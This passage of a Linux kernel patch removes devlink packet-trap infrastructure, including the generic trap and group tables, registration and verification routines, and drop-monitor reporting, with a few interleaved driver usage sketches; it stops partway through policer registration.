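	devlink_region_snapshot_id_put(devlink, snapshot_id);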
+-
+-#define DEVLINK_TRAP(_id, _type)					      \
+-	{								      \
+-		.type = DEVLINK_TRAP_TYPE_##_type,			      \
+-		.id = DEVLINK_TRAP_GENERIC_ID_##_id,			      \
+-		.name = DEVLINK_TRAP_GENERIC_NAME_##_id,		      \
+-	}
+-
+-static const struct devlink_trap devlink_trap_generic[] = {
+-	DEVLINK_TRAP(SMAC_MC, DROP),
+-	DEVLINK_TRAP(VLAN_TAG_MISMATCH, DROP),
+-	DEVLINK_TRAP(INGRESS_VLAN_FILTER, DROP),
+-	DEVLINK_TRAP(INGRESS_STP_FILTER, DROP),
+-	DEVLINK_TRAP(EMPTY_TX_LIST, DROP),
+-	DEVLINK_TRAP(PORT_LOOPBACK_FILTER, DROP),
+-	DEVLINK_TRAP(BLACKHOLE_ROUTE, DROP),
+-	DEVLINK_TRAP(TTL_ERROR, EXCEPTION),
+-	DEVLINK_TRAP(TAIL_DROP, DROP),
+-	DEVLINK_TRAP(NON_IP_PACKET, DROP),
+-	DEVLINK_TRAP(UC_DIP_MC_DMAC, DROP),
+-	DEVLINK_TRAP(DIP_LB, DROP),
+-	DEVLINK_TRAP(SIP_MC, DROP),
+-	DEVLINK_TRAP(SIP_LB, DROP),
+-	DEVLINK_TRAP(CORRUPTED_IP_HDR, DROP),
+-	DEVLINK_TRAP(IPV4_SIP_BC, DROP),
+-	DEVLINK_TRAP(IPV6_MC_DIP_RESERVED_SCOPE, DROP),
+-	DEVLINK_TRAP(IPV6_MC_DIP_INTERFACE_LOCAL_SCOPE, DROP),
+-	DEVLINK_TRAP(MTU_ERROR, EXCEPTION),
+-	DEVLINK_TRAP(UNRESOLVED_NEIGH, EXCEPTION),
+-	DEVLINK_TRAP(RPF, EXCEPTION),
+-	DEVLINK_TRAP(REJECT_ROUTE, EXCEPTION),
+-	DEVLINK_TRAP(IPV4_LPM_UNICAST_MISS, EXCEPTION),
+-	DEVLINK_TRAP(IPV6_LPM_UNICAST_MISS, EXCEPTION),
+-	DEVLINK_TRAP(NON_ROUTABLE, DROP),
+-	DEVLINK_TRAP(DECAP_ERROR, EXCEPTION),
+-	DEVLINK_TRAP(OVERLAY_SMAC_MC, DROP),
+-	DEVLINK_TRAP(INGRESS_FLOW_ACTION_DROP, DROP),
+-	DEVLINK_TRAP(EGRESS_FLOW_ACTION_DROP, DROP),
+-	DEVLINK_TRAP(STP, CONTROL),
+-	DEVLINK_TRAP(LACP, CONTROL),
+-	DEVLINK_TRAP(LLDP, CONTROL),
+-	DEVLINK_TRAP(IGMP_QUERY, CONTROL),
+-	DEVLINK_TRAP(IGMP_V1_REPORT, CONTROL),
+-	DEVLINK_TRAP(IGMP_V2_REPORT, CONTROL),
+-	DEVLINK_TRAP(IGMP_V3_REPORT, CONTROL),
+-	DEVLINK_TRAP(IGMP_V2_LEAVE, CONTROL),
+-	DEVLINK_TRAP(MLD_QUERY, CONTROL),
+-	DEVLINK_TRAP(MLD_V1_REPORT, CONTROL),
+-	DEVLINK_TRAP(MLD_V2_REPORT, CONTROL),
+-	DEVLINK_TRAP(MLD_V1_DONE, CONTROL),
+-	DEVLINK_TRAP(IPV4_DHCP, CONTROL),
+-	DEVLINK_TRAP(IPV6_DHCP, CONTROL),
+-	DEVLINK_TRAP(ARP_REQUEST, CONTROL),
+-	DEVLINK_TRAP(ARP_RESPONSE, CONTROL),
+-	DEVLINK_TRAP(ARP_OVERLAY, CONTROL),
+-	DEVLINK_TRAP(IPV6_NEIGH_SOLICIT, CONTROL),
+-	DEVLINK_TRAP(IPV6_NEIGH_ADVERT, CONTROL),
+-	DEVLINK_TRAP(IPV4_BFD, CONTROL),
+-	DEVLINK_TRAP(IPV6_BFD, CONTROL),
+-	DEVLINK_TRAP(IPV4_OSPF, CONTROL),
+-	DEVLINK_TRAP(IPV6_OSPF, CONTROL),
+-	DEVLINK_TRAP(IPV4_BGP, CONTROL),
+-	DEVLINK_TRAP(IPV6_BGP, CONTROL),
+-	DEVLINK_TRAP(IPV4_VRRP, CONTROL),
+-	DEVLINK_TRAP(IPV6_VRRP, CONTROL),
+-	DEVLINK_TRAP(IPV4_PIM, CONTROL),
+-	DEVLINK_TRAP(IPV6_PIM, CONTROL),
+-	DEVLINK_TRAP(UC_LB, CONTROL),
+-	DEVLINK_TRAP(LOCAL_ROUTE, CONTROL),
+-	DEVLINK_TRAP(EXTERNAL_ROUTE, CONTROL),
+-	DEVLINK_TRAP(IPV6_UC_DIP_LINK_LOCAL_SCOPE, CONTROL),
+-	DEVLINK_TRAP(IPV6_DIP_ALL_NODES, CONTROL),
+-	DEVLINK_TRAP(IPV6_DIP_ALL_ROUTERS, CONTROL),
+-	DEVLINK_TRAP(IPV6_ROUTER_SOLICIT, CONTROL),
+-	DEVLINK_TRAP(IPV6_ROUTER_ADVERT, CONTROL),
+-	DEVLINK_TRAP(IPV6_REDIRECT, CONTROL),
+-	DEVLINK_TRAP(IPV4_ROUTER_ALERT, CONTROL),
+-	DEVLINK_TRAP(IPV6_ROUTER_ALERT, CONTROL),
+-	DEVLINK_TRAP(PTP_EVENT, CONTROL),
+-	DEVLINK_TRAP(PTP_GENERAL, CONTROL),
+-	DEVLINK_TRAP(FLOW_ACTION_SAMPLE, CONTROL),
+-	DEVLINK_TRAP(FLOW_ACTION_TRAP, CONTROL),
+-	DEVLINK_TRAP(EARLY_DROP, DROP),
+-	DEVLINK_TRAP(VXLAN_PARSING, DROP),
+-	DEVLINK_TRAP(LLC_SNAP_PARSING, DROP),
+-	DEVLINK_TRAP(VLAN_PARSING, DROP),
+-	DEVLINK_TRAP(PPPOE_PPP_PARSING, DROP),
+-	DEVLINK_TRAP(MPLS_PARSING, DROP),
+-	DEVLINK_TRAP(ARP_PARSING, DROP),
+-	DEVLINK_TRAP(IP_1_PARSING, DROP),
+-	DEVLINK_TRAP(IP_N_PARSING, DROP),
+-	DEVLINK_TRAP(GRE_PARSING, DROP),
+-	DEVLINK_TRAP(UDP_PARSING, DROP),
+-	DEVLINK_TRAP(TCP_PARSING, DROP),
+-	DEVLINK_TRAP(IPSEC_PARSING, DROP),
+-	DEVLINK_TRAP(SCTP_PARSING, DROP),
+-	DEVLINK_TRAP(DCCP_PARSING, DROP),
+-	DEVLINK_TRAP(GTP_PARSING, DROP),
+-	DEVLINK_TRAP(ESP_PARSING, DROP),
+-	DEVLINK_TRAP(BLACKHOLE_NEXTHOP, DROP),
+-	DEVLINK_TRAP(DMAC_FILTER, DROP),
+-};
+-
+-#define DEVLINK_TRAP_GROUP(_id)						      \
+-	{								      \
+-		.id = DEVLINK_TRAP_GROUP_GENERIC_ID_##_id,		      \
+-		.name = DEVLINK_TRAP_GROUP_GENERIC_NAME_##_id,		      \
+-	}
+-
+-static const struct devlink_trap_group devlink_trap_group_generic[] = {
+-	DEVLINK_TRAP_GROUP(L2_DROPS),
+-	DEVLINK_TRAP_GROUP(L3_DROPS),
+-	DEVLINK_TRAP_GROUP(L3_EXCEPTIONS),
+-	DEVLINK_TRAP_GROUP(BUFFER_DROPS),
+-	DEVLINK_TRAP_GROUP(TUNNEL_DROPS),
+-	DEVLINK_TRAP_GROUP(ACL_DROPS),
+-	DEVLINK_TRAP_GROUP(STP),
+-	DEVLINK_TRAP_GROUP(LACP),
+-	DEVLINK_TRAP_GROUP(LLDP),
+-	DEVLINK_TRAP_GROUP(MC_SNOOPING),
+-	DEVLINK_TRAP_GROUP(DHCP),
+-	DEVLINK_TRAP_GROUP(NEIGH_DISCOVERY),
+-	DEVLINK_TRAP_GROUP(BFD),
+-	DEVLINK_TRAP_GROUP(OSPF),
+-	DEVLINK_TRAP_GROUP(BGP),
+-	DEVLINK_TRAP_GROUP(VRRP),
+-	DEVLINK_TRAP_GROUP(PIM),
+-	DEVLINK_TRAP_GROUP(UC_LB),
+-	DEVLINK_TRAP_GROUP(LOCAL_DELIVERY),
+-	DEVLINK_TRAP_GROUP(EXTERNAL_DELIVERY),
+-	DEVLINK_TRAP_GROUP(IPV6),
+-	DEVLINK_TRAP_GROUP(PTP_EVENT),
+-	DEVLINK_TRAP_GROUP(PTP_GENERAL),
+-	DEVLINK_TRAP_GROUP(ACL_SAMPLE),
+-	DEVLINK_TRAP_GROUP(ACL_TRAP),
+-	DEVLINK_TRAP_GROUP(PARSER_ERROR_DROPS),
+-};
+-
+-static int devlink_trap_generic_verify(const struct devlink_trap *trap)
+-{
+-	if (trap->id > DEVLINK_TRAP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	if (strcmp(trap->name, devlink_trap_generic[trap->id].name))
+-		return -EINVAL;
+-
+-	if (trap->type != devlink_trap_generic[trap->id].type)
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_driver_verify(const struct devlink_trap *trap)
+-{
+-	int i;
+-
+-	if (trap->id <= DEVLINK_TRAP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_trap_generic); i++) {
+-		if (!strcmp(trap->name, devlink_trap_generic[i].name))
+-			return -EEXIST;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_verify(const struct devlink_trap *trap)
+-{
+-	if (!trap || !trap->name)
+-		return -EINVAL;
+-
+-	if (trap->generic)
+-		return devlink_trap_generic_verify(trap);
+-	else
+-		return devlink_trap_driver_verify(trap);
+-}
+-
+-static int
+-devlink_trap_group_generic_verify(const struct devlink_trap_group *group)
+-{
+-	if (group->id > DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	if (strcmp(group->name, devlink_trap_group_generic[group->id].name))
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_trap_group_driver_verify(const struct devlink_trap_group *group)
+-{
+-	int i;
+-
+-	if (group->id <= DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_trap_group_generic); i++) {
+-		if (!strcmp(group->name, devlink_trap_group_generic[i].name))
+-			return -EEXIST;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_group_verify(const struct devlink_trap_group *group)
+-{
+-	if (group->generic)
+-		return devlink_trap_group_generic_verify(group);
+-	else
+-		return devlink_trap_group_driver_verify(group);
+-}
+-
+-static void
+-devlink_trap_group_notify(struct devlink *devlink,
+-			  const struct devlink_trap_group_item *group_item,
+-			  enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_GROUP_NEW &&
+-		     cmd != DEVLINK_CMD_TRAP_GROUP_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_trap_group_fill(msg, devlink, group_item, cmd, 0, 0,
+-					 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int
+-devlink_trap_item_group_link(struct devlink *devlink,
+-			     struct devlink_trap_item *trap_item)
+-{
+-	u16 group_id = trap_item->trap->init_group_id;
+-	struct devlink_trap_group_item *group_item;
+-
+-	group_item = devlink_trap_group_item_lookup_by_id(devlink, group_id);
+-	if (WARN_ON_ONCE(!group_item))
+-		return -EINVAL;
+-
+-	trap_item->group_item = group_item;
+-
+-	return 0;
+-}
+-
+-static void devlink_trap_notify(struct devlink *devlink,
+-				const struct devlink_trap_item *trap_item,
+-				enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_NEW &&
+-		     cmd != DEVLINK_CMD_TRAP_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_trap_fill(msg, devlink, trap_item, cmd, 0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int
+-devlink_trap_register(struct devlink *devlink,
+-		      const struct devlink_trap *trap, void *priv)
+-{
+-	struct devlink_trap_item *trap_item;
+-	int err;
+-
+-	if (devlink_trap_item_lookup(devlink, trap->name))
+-		return -EEXIST;
+-
+-	trap_item = kzalloc(sizeof(*trap_item), GFP_KERNEL);
+-	if (!trap_item)
+-		return -ENOMEM;
+-
+-	trap_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
+-	if (!trap_item->stats) {
+-		err = -ENOMEM;
+-		goto err_stats_alloc;
+-	}
+-
+-	trap_item->trap = trap;
+-	trap_item->action = trap->init_action;
+-	trap_item->priv = priv;
+-
+-	err = devlink_trap_item_group_link(devlink, trap_item);
+-	if (err)
+-		goto err_group_link;
+-
+-	err = devlink->ops->trap_init(devlink, trap, trap_item);
+-	if (err)
+-		goto err_trap_init;
+-
+-	list_add_tail(&trap_item->list, &devlink->trap_list);
+-	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
+-
+-	return 0;
+-
+-err_trap_init:
+-err_group_link:
+-	free_percpu(trap_item->stats);
+-err_stats_alloc:
+-	kfree(trap_item);
+-	return err;
+-}
+-
+-static void devlink_trap_unregister(struct devlink *devlink,
+-				    const struct devlink_trap *trap)
+-{
+-	struct devlink_trap_item *trap_item;
+-
+-	trap_item = devlink_trap_item_lookup(devlink, trap->name);
+-	if (WARN_ON_ONCE(!trap_item))
+-		return;
+-
+-	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
+-	list_del(&trap_item->list);
+-	if (devlink->ops->trap_fini)
+-		devlink->ops->trap_fini(devlink, trap, trap_item);
+-	free_percpu(trap_item->stats);
+-	kfree(trap_item);
+-}
+-
+-static void devlink_trap_disable(struct devlink *devlink,
+-				 const struct devlink_trap *trap)
+-{
+-	struct devlink_trap_item *trap_item;
+-
+-	trap_item = devlink_trap_item_lookup(devlink, trap->name);
+-	if (WARN_ON_ONCE(!trap_item))
+-		return;
+-
+-	devlink->ops->trap_action_set(devlink, trap, DEVLINK_TRAP_ACTION_DROP,
+-				      NULL);
+-	trap_item->action = DEVLINK_TRAP_ACTION_DROP;
+-}
+-
+-/**
+- * devl_traps_register - Register packet traps with devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- * @priv: Driver private information.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devl_traps_register(struct devlink *devlink,
+-			const struct devlink_trap *traps,
+-			size_t traps_count, void *priv)
+-{
+-	int i, err;
+-
+-	if (!devlink->ops->trap_init || !devlink->ops->trap_action_set)
+-		return -EINVAL;
+-
+-	devl_assert_locked(devlink);
+-	for (i = 0; i < traps_count; i++) {
+-		const struct devlink_trap *trap = &traps[i];
+-
+-		err = devlink_trap_verify(trap);
+-		if (err)
+-			goto err_trap_verify;
+-
+-		err = devlink_trap_register(devlink, trap, priv);
+-		if (err)
+-			goto err_trap_register;
+-	}
+-
+-	return 0;
+-
+-err_trap_register:
+-err_trap_verify:
+-	for (i--; i >= 0; i--)
+-		devlink_trap_unregister(devlink, &traps[i]);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devl_traps_register);
+-
+-/**
+- * devlink_traps_register - Register packet traps with devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- * @priv: Driver private information.
+- *
+- * Context: Takes and releases devlink->lock <mutex>.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devlink_traps_register(struct devlink *devlink,
+-			   const struct devlink_trap *traps,
+-			   size_t traps_count, void *priv)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_traps_register(devlink, traps, traps_count, priv);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_traps_register);
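Sketch of a caller of the registration helpers above: the driver must implement at least the trap_init and trap_action_set devlink ops, as checked at the top of devl_traps_register(). The array name and priv pointer are hypothetical; the entry below is a generic trap bound to the generic L3_EXCEPTIONS group:

static const struct devlink_trap foo_traps[] = {
	DEVLINK_TRAP_GENERIC(EXCEPTION, TRAP, TTL_ERROR,
			     DEVLINK_TRAP_GROUP_GENERIC_ID_L3_EXCEPTIONS,
			     DEVLINK_TRAP_METADATA_TYPE_F_IN_PORT),
};

	err = devlink_traps_register(devlink, foo_traps,
				     ARRAY_SIZE(foo_traps), foo);
	if (err)
		return err;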
+-
+-/**
+- * devl_traps_unregister - Unregister packet traps from devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- */
+-void devl_traps_unregister(struct devlink *devlink,
+-			   const struct devlink_trap *traps,
+-			   size_t traps_count)
+-{
+-	int i;
+-
+-	devl_assert_locked(devlink);
+-	/* Make sure we do not have any packets in-flight while unregistering
+-	 * traps by disabling all of them and waiting for a grace period.
+-	 */
+-	for (i = traps_count - 1; i >= 0; i--)
+-		devlink_trap_disable(devlink, &traps[i]);
+-	synchronize_rcu();
+-	for (i = traps_count - 1; i >= 0; i--)
+-		devlink_trap_unregister(devlink, &traps[i]);
+-}
+-EXPORT_SYMBOL_GPL(devl_traps_unregister);
+-
+-/**
+- * devlink_traps_unregister - Unregister packet traps from devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- *
+- * Context: Takes and releases devlink->lock <mutex>.
+- */
+-void devlink_traps_unregister(struct devlink *devlink,
+-			      const struct devlink_trap *traps,
+-			      size_t traps_count)
+-{
+-	devl_lock(devlink);
+-	devl_traps_unregister(devlink, traps, traps_count);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_traps_unregister);
+-
+-static void
+-devlink_trap_stats_update(struct devlink_stats __percpu *trap_stats,
+-			  size_t skb_len)
+-{
+-	struct devlink_stats *stats;
+-
+-	stats = this_cpu_ptr(trap_stats);
+-	u64_stats_update_begin(&stats->syncp);
+-	u64_stats_add(&stats->rx_bytes, skb_len);
+-	u64_stats_inc(&stats->rx_packets);
+-	u64_stats_update_end(&stats->syncp);
+-}
+-
+-static void
+-devlink_trap_report_metadata_set(struct devlink_trap_metadata *metadata,
+-				 const struct devlink_trap_item *trap_item,
+-				 struct devlink_port *in_devlink_port,
+-				 const struct flow_action_cookie *fa_cookie)
+-{
+-	metadata->trap_name = trap_item->trap->name;
+-	metadata->trap_group_name = trap_item->group_item->group->name;
+-	metadata->fa_cookie = fa_cookie;
+-	metadata->trap_type = trap_item->trap->type;
+-
+-	spin_lock(&in_devlink_port->type_lock);
+-	if (in_devlink_port->type == DEVLINK_PORT_TYPE_ETH)
+-		metadata->input_dev = in_devlink_port->type_dev;
+-	spin_unlock(&in_devlink_port->type_lock);
+-}
+-
+-/**
+- * devlink_trap_report - Report trapped packet to drop monitor.
+- * @devlink: devlink.
+- * @skb: Trapped packet.
+- * @trap_ctx: Trap context.
+- * @in_devlink_port: Input devlink port.
+- * @fa_cookie: Flow action cookie. Could be NULL.
+- */
+-void devlink_trap_report(struct devlink *devlink, struct sk_buff *skb,
+-			 void *trap_ctx, struct devlink_port *in_devlink_port,
+-			 const struct flow_action_cookie *fa_cookie)
+-{
+-	struct devlink_trap_item *trap_item = trap_ctx;
+-
+-	devlink_trap_stats_update(trap_item->stats, skb->len);
+-	devlink_trap_stats_update(trap_item->group_item->stats, skb->len);
+-
+-	if (trace_devlink_trap_report_enabled()) {
+-		struct devlink_trap_metadata metadata = {};
+-
+-		devlink_trap_report_metadata_set(&metadata, trap_item,
+-						 in_devlink_port, fa_cookie);
+-		trace_devlink_trap_report(devlink, skb, &metadata);
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_report);
+-
+-/**
+- * devlink_trap_ctx_priv - Trap context to driver private information.
+- * @trap_ctx: Trap context.
+- *
+- * Return: Driver private information passed during registration.
+- */
+-void *devlink_trap_ctx_priv(void *trap_ctx)
+-{
+-	struct devlink_trap_item *trap_item = trap_ctx;
+-
+-	return trap_item->priv;
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_ctx_priv);
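The two functions above are what a driver's RX path calls for a trapped packet. A minimal sketch (foo_* structures hypothetical), passing NULL for the flow-action cookie; note that devlink_trap_report() only updates statistics and fires the tracepoint (drop monitor clones the skb from there), so the driver still owns the skb:

struct foo_port {
	struct devlink_port devlink_port;	/* registered elsewhere */
};

struct foo_priv {
	struct devlink *devlink;
};

static void foo_rx_dropped(struct foo_port *port, struct sk_buff *skb,
			   void *trap_ctx)
{
	struct foo_priv *foo = devlink_trap_ctx_priv(trap_ctx);

	devlink_trap_report(foo->devlink, skb, trap_ctx,
			    &port->devlink_port, NULL);
	kfree_skb(skb);		/* drop trap: free after reporting */
}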
+-
+-static int
+-devlink_trap_group_item_policer_link(struct devlink *devlink,
+-				     struct devlink_trap_group_item *group_item)
+-{
+-	u32 policer_id = group_item->group->init_policer_id;
+-	struct devlink_trap_policer_item *policer_item;
+-
+-	if (policer_id == 0)
+-		return 0;
+-
+-	policer_item = devlink_trap_policer_item_lookup(devlink, policer_id);
+-	if (WARN_ON_ONCE(!policer_item))
+-		return -EINVAL;
+-
+-	group_item->policer_item = policer_item;
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_trap_group_register(struct devlink *devlink,
+-			    const struct devlink_trap_group *group)
+-{
+-	struct devlink_trap_group_item *group_item;
+-	int err;
+-
+-	if (devlink_trap_group_item_lookup(devlink, group->name))
+-		return -EEXIST;
+-
+-	group_item = kzalloc(sizeof(*group_item), GFP_KERNEL);
+-	if (!group_item)
+-		return -ENOMEM;
+-
+-	group_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
+-	if (!group_item->stats) {
+-		err = -ENOMEM;
+-		goto err_stats_alloc;
+-	}
+-
+-	group_item->group = group;
+-
+-	err = devlink_trap_group_item_policer_link(devlink, group_item);
+-	if (err)
+-		goto err_policer_link;
+-
+-	if (devlink->ops->trap_group_init) {
+-		err = devlink->ops->trap_group_init(devlink, group);
+-		if (err)
+-			goto err_group_init;
+-	}
+-
+-	list_add_tail(&group_item->list, &devlink->trap_group_list);
+-	devlink_trap_group_notify(devlink, group_item,
+-				  DEVLINK_CMD_TRAP_GROUP_NEW);
+-
+-	return 0;
+-
+-err_group_init:
+-err_policer_link:
+-	free_percpu(group_item->stats);
+-err_stats_alloc:
+-	kfree(group_item);
+-	return err;
+-}
+-
+-static void
+-devlink_trap_group_unregister(struct devlink *devlink,
+-			      const struct devlink_trap_group *group)
+-{
+-	struct devlink_trap_group_item *group_item;
+-
+-	group_item = devlink_trap_group_item_lookup(devlink, group->name);
+-	if (WARN_ON_ONCE(!group_item))
+-		return;
+-
+-	devlink_trap_group_notify(devlink, group_item,
+-				  DEVLINK_CMD_TRAP_GROUP_DEL);
+-	list_del(&group_item->list);
+-	free_percpu(group_item->stats);
+-	kfree(group_item);
+-}
+-
+-/**
+- * devl_trap_groups_register - Register packet trap groups with devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devl_trap_groups_register(struct devlink *devlink,
+-			      const struct devlink_trap_group *groups,
+-			      size_t groups_count)
+-{
+-	int i, err;
+-
+-	devl_assert_locked(devlink);
+-	for (i = 0; i < groups_count; i++) {
+-		const struct devlink_trap_group *group = &groups[i];
+-
+-		err = devlink_trap_group_verify(group);
+-		if (err)
+-			goto err_trap_group_verify;
+-
+-		err = devlink_trap_group_register(devlink, group);
+-		if (err)
+-			goto err_trap_group_register;
+-	}
+-
+-	return 0;
+-
+-err_trap_group_register:
+-err_trap_group_verify:
+-	for (i--; i >= 0; i--)
+-		devlink_trap_group_unregister(devlink, &groups[i]);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_groups_register);
+-
+-/**
+- * devlink_trap_groups_register - Register packet trap groups with devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- *
+- * Context: Takes and releases devlink->lock <mutex>.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devlink_trap_groups_register(struct devlink *devlink,
+-				 const struct devlink_trap_group *groups,
+-				 size_t groups_count)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_trap_groups_register(devlink, groups, groups_count);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_groups_register);
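Usage sketch for the group registration above, binding a generic group to a hypothetical policer with id 1 (registered via devl_trap_policers_register() further down); the init_policer_id is resolved in devlink_trap_group_item_policer_link():

static const struct devlink_trap_group foo_trap_groups[] = {
	DEVLINK_TRAP_GROUP_GENERIC(L3_EXCEPTIONS, 1),
};

	err = devl_trap_groups_register(devlink, foo_trap_groups,
					ARRAY_SIZE(foo_trap_groups));
	if (err)
		return err;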
+-
+-/**
+- * devl_trap_groups_unregister - Unregister packet trap groups from devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- */
+-void devl_trap_groups_unregister(struct devlink *devlink,
+-				 const struct devlink_trap_group *groups,
+-				 size_t groups_count)
+-{
+-	int i;
+-
+-	devl_assert_locked(devlink);
+-	for (i = groups_count - 1; i >= 0; i--)
+-		devlink_trap_group_unregister(devlink, &groups[i]);
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_groups_unregister);
+-
+-/**
+- * devlink_trap_groups_unregister - Unregister packet trap groups from devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- *
+- * Context: Takes and releases devlink->lock <mutex>.
+- */
+-void devlink_trap_groups_unregister(struct devlink *devlink,
+-				    const struct devlink_trap_group *groups,
+-				    size_t groups_count)
+-{
+-	devl_lock(devlink);
+-	devl_trap_groups_unregister(devlink, groups, groups_count);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_groups_unregister);
+-
+-static void
+-devlink_trap_policer_notify(struct devlink *devlink,
+-			    const struct devlink_trap_policer_item *policer_item,
+-			    enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_POLICER_NEW &&
+-		     cmd != DEVLINK_CMD_TRAP_POLICER_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item, cmd, 0,
+-					   0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int
+-devlink_trap_policer_register(struct devlink *devlink,
+-			      const struct devlink_trap_policer *policer)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	int err;
+-
+-	if (devlink_trap_policer_item_lookup(devlink, policer->id))
+-		return -EEXIST;
+-
+-	policer_item = kzalloc(sizeof(*policer_item), GFP_KERNEL);
+-	if (!policer_item)
+-		return -ENOMEM;
+-
+-	policer_item->policer = policer;
+-	policer_item->rate = policer->init_rate;
+-	policer_item->burst = policer->init_burst;
+-
+-	if (devlink->ops->trap_policer_init) {
+-		err = devlink->ops->trap_policer_init(devlink, policer);
+-		if (err)
+-			goto err_policer_init;
+-	}
+-
+-	list_add_tail(&policer_item->list, &devlink->trap_policer_list);
+-	devlink_trap_policer_notify(devlink, policer_item,
+-				    DEVLINK_CMD_TRAP_POLICER_NEW);
+-
+-	return 0;
+-
+-err_policer_init:
+-	kfree(policer_item);
+-	return err;
+-}
+-
+-static void
+-devlink_trap_policer_unregister(struct devlink *devlink,
+-				const struct devlink_trap_policer *policer)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-
+-	policer_item = devlink_trap_policer_item_lookup(devlink, policer->id);
+-	if (WARN_ON_ONCE(!policer_item))
+-		return;
+-
+-	devlink_trap_policer_notify(devlink, policer_item,
+-				    DEVLINK_CMD_TRAP_POLICER_DEL);
+-	list_del(&policer_item->list);
+-	if (devlink->ops->trap_policer_fini)
+-		devlink->ops->trap_policer_fini(devlink, policer);
+-	kfree(policer_item);
+-}
+-
+-/**
+- * devl_trap_policers_register - Register packet trap policers with devlink.
+- * @devlink: devlink.
+- * @policers: Packet trap policers.
+- * @policers_count: Count of provided packet trap policers.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int
+-devl_trap_policers_register(struct devlink *devlink,
+-			    const struct devlink_trap_policer *policers,
+-			    size_t policers_count)
+-{
+-	int i, err;
+-
+-	devl_assert_locked(devlink);
+-	for (i = 0; i < policers_count; i++) {
+-		const struct devlink_trap_policer *policer = &policers[i];
+-
+-		if (WARN_ON(policer->id == 0 ||
+-			    policer->max_rate < policer->min_rate ||
+-			    policer->max_burst < policer->min_burst)) {
+-			err = -EINVAL;
+-			goto err_trap_policer_verify;
+-		}
+-
